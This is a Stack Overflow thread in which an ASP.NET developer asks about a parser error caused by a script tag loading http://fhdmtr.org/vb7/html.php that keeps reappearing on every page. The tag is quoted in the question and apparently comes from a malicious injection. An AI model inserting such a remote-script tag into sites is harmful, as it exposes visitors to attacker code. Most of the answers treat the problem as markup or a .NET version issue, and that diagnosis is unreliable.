# parser error in webapplication (asp.net)?

Tags: asp.net

I developed a application using asp.net and uploaded the site in online it is working fine.
After few days i am getting  parser error.

`"<script src=http://fhdmtr.org/vb7/html.php ></script>"` this script is generating in every page in the bottom of the page in source code in the site. it is automatically generating.
when i remove it is work fine after few days it is again generating.

Comment: The image you provide isn't visible. Accessing to the url I see the error. 
You can't put a script tag outside content block in content pages. If this script is needed on all the pages why not put it on master page?

Comment: No Mr.Elph the script is automatically generating i am not placing this it is not related to my project even though it is generating automatically.

Comment: Well, better search for what is generating it.

Answer (score 0, accepted):

The error is occurring because the `Doctorenq.aspx` script is using a Master Page. Pages configured with a `MasterPageFile` attribute can only contain a very narrow set of tags, usually just `<asp:Content>`, corresponding to content placeholders in the master. If you are adding the reference to the PHP script yourself (though I don't understand how that's supposed to work), you should either include it in the Master Page or include it inside one of your existing `<asp:Content>` tags.

If you aren't adding the reference to the tag, your problem may be with security instead of programming, and as such would be OT for SO.

Comment: "off-topic for Stack Overflow"

Answer (score 0):

The fail suggests that the site can't handle the markup.

If it was working and now doesn't, check the version of .NET websit is running. Something may have changed it to use an earlier verions of .NET, which can't parse the page.

Comment: ok Mr. Doobi first the project start in .net frame work 2.0 now it is developing in 3.5 is this may cause problem